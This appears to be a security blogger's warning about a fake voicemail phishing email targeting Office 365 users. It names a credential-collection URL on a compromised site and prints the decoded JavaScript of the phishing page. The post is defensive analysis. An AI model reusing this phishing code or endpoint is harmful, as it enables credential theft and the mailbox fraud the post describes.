You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021 - SPAM WARNING!!
This message has been seen going out to Office 365 and other clients.
Beware!!! - This email is a phishing trick to get your password for Office 356 and may also contain malware to damage or compromise your computer:
Hello Recipient,
Your caller left you 3 voicemail messages.
Voice - Message for: [email protected] (MISSED CALLS)
CALLER NUMBER : +44 335970973
Please download attachment to listen to Message
Messages will auto delete in 2 hours
As you can see it appears to just record the email address:
The site to which your credentials will be sent appears to be: http://mtu.edu.ng/wp-content/uploads/2020/9/9/h.php encrypted with Base64 in the JavaScript code on the site:
Their code site appears to be (or have been) protected by Cloudflare who really do need to check on their customers a little more closely.
Then their html code in Base64 reads:
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script
src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/0.4.1/html2canvas.min.js"
integrity="sha256-c3RzsUWg+y2XljunEQS0LqWdQ04X1D3j22fd/8JCAKw="
crossorigin="anonymous"
></script>
<script
src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/1.3.8/FileSaver.min.js"
integrity="sha256-FPJJt8nA+xL4RU6/gsriA8p8xAeLGatoyTjldvQKGdE="
crossorigin="anonymous"
></script>
</head>
<body>
<div id="capture" style="padding: 10px; color: black"></div>
<script type="text/javascript">
try {
var email = atob(e);
} catch (e) {
var email = e;
}
var domain = e.split("@");
setTimeout(() => {
loadPages(
eur +
"?e=" +
e +
"&ep=" +
ep +
"&en=" +
btoa(e) +
"&eu=" +
domain[1]
);
}, 2000);
function loadPages(load) {
var testURL = load;
$.ajax({
url: atob(hp),
method: "POST",
data: { url: testURL },
success: function (response) {
response = response.replace(/href="\//g, 'href="' + testURL + "/");
response = response.replace(/src="\//g, 'src="' + testURL + "/");
response = response.replace(
/content="\//g,
'content="' + testURL + "/"
);
$("#capture").html(response);
// console.log(response);
},
});
}
</script>
</body>
</html>
This code is designed to impersonate the Office 365 login and send your pass word to the hackers so that they can use your credentials to compromise you in some way. Often they are looking for email accounts that they can take control of that deal with invoicing etc. so that they can put fake account details in to try and defraud companies or people.
If you have ever put your email credentials into a page that suddenly redirects you to somewhere unexpected or to your home Office 365 page when you were being asked for access codes, change your password immediately and check your mail account for mailbox rules that you did not create. Typically they pick one person to try and defraud and then make up rules in your mailbox so that you do not see any replies from that person that may give the game away.
If you suspect you have had your mailbox compromised, contact all your friends or suppliers and warn them to be vigilant.